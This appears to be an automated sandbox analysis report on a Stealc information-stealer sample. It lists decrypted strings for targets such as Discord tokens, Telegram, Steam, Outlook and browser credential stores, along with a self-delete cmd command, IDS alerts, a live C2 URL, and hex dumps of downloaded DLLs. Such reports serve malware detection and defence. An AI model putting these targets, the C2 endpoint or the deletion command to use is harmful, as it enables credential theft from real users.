Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - RAM:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Display Resolution:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - GPU:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: User Agents:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Installed Apps:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: All Users:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Current User:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Process List:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: system_info.txt
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: freebl3.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: mozglue.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: msvcp140.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: nss3.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: softokn3.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: vcruntime140.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \Temp\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: .exe
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: runas
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: open
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: /c start
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %DESKTOP%
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %APPDATA%
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %USERPROFILE%
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %DOCUMENTS%
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %PROGRAMFILES%
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %RECENT%
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: *.lnk
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: files
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \discord\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \Local Storage\leveldb
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \Telegram Desktop\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: key_datas
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: map*
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: F8806DD0C461824F*
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Telegram
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: *.tox
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: *.ini
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Password
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: 00000001
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: 00000002
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: 00000003
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: 00000004
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Pidgin
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \.purple\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: accounts.xml
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: token:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Software\Valve\Steam
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SteamPath
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \config\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ssfn*
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: config.vdf
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: DialogConfig.vdf
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: libraryfolders.vdf
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: loginusers.vdf
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \Steam\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: browsers
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: done
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: soft
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: \Discord\tokens.txt
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: https
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: POST
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: HTTP/1.1
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: hwid
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: build
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: token
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: file_name
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: file
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: message
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: screenshot.jpg
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00409540
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_004155A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00406C10
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_004094A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040BF90
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF76C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CF76C80
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0CA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6D0CA9A0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D1125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6D1125B0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D094420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6D094420
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0C4440 PK11_PrivDecrypt, 0_2_6D0C4440
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0C44C0 PK11_PubEncrypt, 0_2_6D0C44C0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D0EA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6D0EA730

Compliance

barindex
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Unpacked PE file: 0.2.z2kQkLtyJW.exe.400000.0.unpack
Source: z2kQkLtyJW.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: mozglue.pdbP source: z2kQkLtyJW.exe, 00000000.00000002.2287579030.000000006CFDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: z2kQkLtyJW.exe, 00000000.00000002.2287579030.000000006CFDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryW,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004015C0 FindFirstFileA,EntryPoint,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking

barindex
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49736 -> 185.172.128.151:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49736 -> 185.172.128.151:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.151:80 -> 192.168.2.4:49736
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49736 -> 185.172.128.151:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.151:80 -> 192.168.2.4:49736
Source: Malware configuration extractor URLs: 185.172.128.151/7043a0c6a68d9c65.php
Source: Malware configuration extractor URLs: http://185.172.128.151/7043a0c6a68d9c65.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:49:28 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:49:31 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:49:31 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 